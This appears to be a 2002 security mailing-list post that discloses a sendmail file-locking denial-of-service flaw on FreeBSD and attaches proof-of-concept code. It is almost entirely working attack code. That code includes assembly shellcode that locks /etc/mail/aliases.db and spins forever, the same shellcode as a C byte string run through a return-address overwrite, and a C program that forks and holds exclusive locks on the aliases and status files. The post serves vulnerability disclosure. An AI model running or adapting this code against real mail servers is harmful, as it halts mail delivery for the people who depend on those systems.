A problem has been identified in sendmail that can result in a denial of service attack. Attached is proof of concept code for this issue. http://www.sendmail.org/LockingAdvisory.txt have a safe Memorial Day folks. -KF ; ; Safemode.org, written by zillion 2002/05/24 ; http://www.snosoft.com : zillion@snosoft.com ; http://www.sendmail.org/LockingAdvisory.txt ; BITS 32 jmp short callit doit: pop esi xor eax,eax mov [esi + 20],al push eax push esi mov al,5 push eax int 0x80 push byte 0x2 push eax mov al,131 push eax int 0x80 ; Where going to stay forever ;-) sub cl,0x3 l00p: js l00p callit: call doit db '/etc/mail/aliases.db' /* FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db Written by zillion (at http://www.safemode.org && http://www.snosoft.com) More info: http://www.sendmail.org/LockingAdvisory.txt */ char shellcode[] = "\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80" "\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1" "\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c" "\x69\x61\x73\x65\x73\x2e\x64\x62"; int main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } #include #include /* Stupid piece of code to test the sendmail lock vulnerability on FreeBSD. Run this and try sendmail -t on FreeBSD for example. More info: http://www.sendmail.org/LockingAdvisory.txt zillion (at safemode.org && snosoft.com) http://www.safemode.org http://www.snosoft.com */ int main() { if(fork() == 0) { char *lock1 = "/etc/mail/aliases"; char *lock2 = "/etc/mail/aliases.db"; char *lock3 = "/var/log/sendmail.st"; int fd; fd = open(lock1,O_RDONLY); flock(fd,0x02); fd = open(lock2,O_RDONLY); flock(fd,0x02); fd = open(lock3,O_RDONLY); flock(fd,0x02); /* We are here to stay! */ for(;;) {} } }